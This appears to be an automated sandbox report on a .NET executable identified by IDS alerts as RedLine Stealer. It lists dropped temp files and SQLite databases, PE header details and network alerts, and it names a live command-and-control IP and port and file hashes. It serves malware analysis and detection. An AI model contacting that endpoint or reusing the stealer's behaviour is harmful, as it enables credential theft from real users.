SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpA89D.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpA89E.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpA89F.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpA8B0.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpCA15.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA25.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA46.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA56.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCA67.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE4CC.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE4DD.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.504401602755245
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	qJ64p5G1XJ.exe
File size:	649'216 bytes
MD5:	d666c758be2a66a4c8e0d3c089ea75b1
SHA1:	9ef031c211fb82b0810a45256ca9ad32f1577ad5
SHA256:	9fd0ede72e03f6a4897daaa809a4dafa9b9e0eeac52c5244b11df40e9a4af2f2
SHA512:	56931556326f41f360b31658ec4fb92104bc7610923429175d71e96e87258e22a574229fedc4262df52d33e631062a0710385131834399041d8ca9c89bf91f37
SSDEEP:	12288:B89WXV7O3SdeYogO832DYJTX6Y8RJ8y/59ifSA1Bd/:ZOi4b83tf8RtB9i62BF
TLSH:	7FD4AEC03B397711DDACB6748526DDB8A3652E28B010F9E26EDD3B8776DD202A91CF41
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<`...............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x49e5ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8C603CDE [Thu Aug 18 07:14:38 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
lodsd
fiadd word ptr [eax]
add bh, ch
mov esi, CAFE0000h
add byte ptr [eax], al
mov esi, 000000BAh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9e59a	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x1b58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9ca44	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9c604	0x9c800	65eba6ebea96d76bf25af60962af2d3d	False	0.8328440120806709	data	7.50764095997495	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x1b58	0x1c00	c12bbd390067b36817bef452d5869c36	False	0.7737165178571429	data	7.224094092148352	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa2000	0xc	0x200	ba4ec789d42b808bcf7b7077beea1769	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa0130	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0xa164c	0x14	data	0.9
RT_VERSION	0xa1660	0x30c	data	0.4358974358974359
RT_MANIFEST	0xa196c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-22T14:12:01.738282+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49734	45.137.22.227	55615	TCP
2025-01-22T14:12:01.738282+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49734	45.137.22.227	55615	TCP
2025-01-22T14:12:06.748945+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	45.137.22.227	55615	192.168.2.4	49734	TCP
2025-01-22T14:12:06.972751+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49734	45.137.22.227	55615	TCP
2025-01-22T14:12:11.336369+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	45.137.22.227	55615	192.168.2.4	49734	TCP
2025-01-22T14:12:11.336369+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45.137.22.227	55615	192.168.2.4	49734	TCP
2025-01-22T14:12:11.744860+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49738	45.137.22.227	55615	TCP
2025-01-22T14:12:13.384894+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49740	45.137.22.227	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 14:12:01.027610064 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:01.032891989 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:01.032991886 CET	49734	55615	192.168.2.4	45.137.22.227
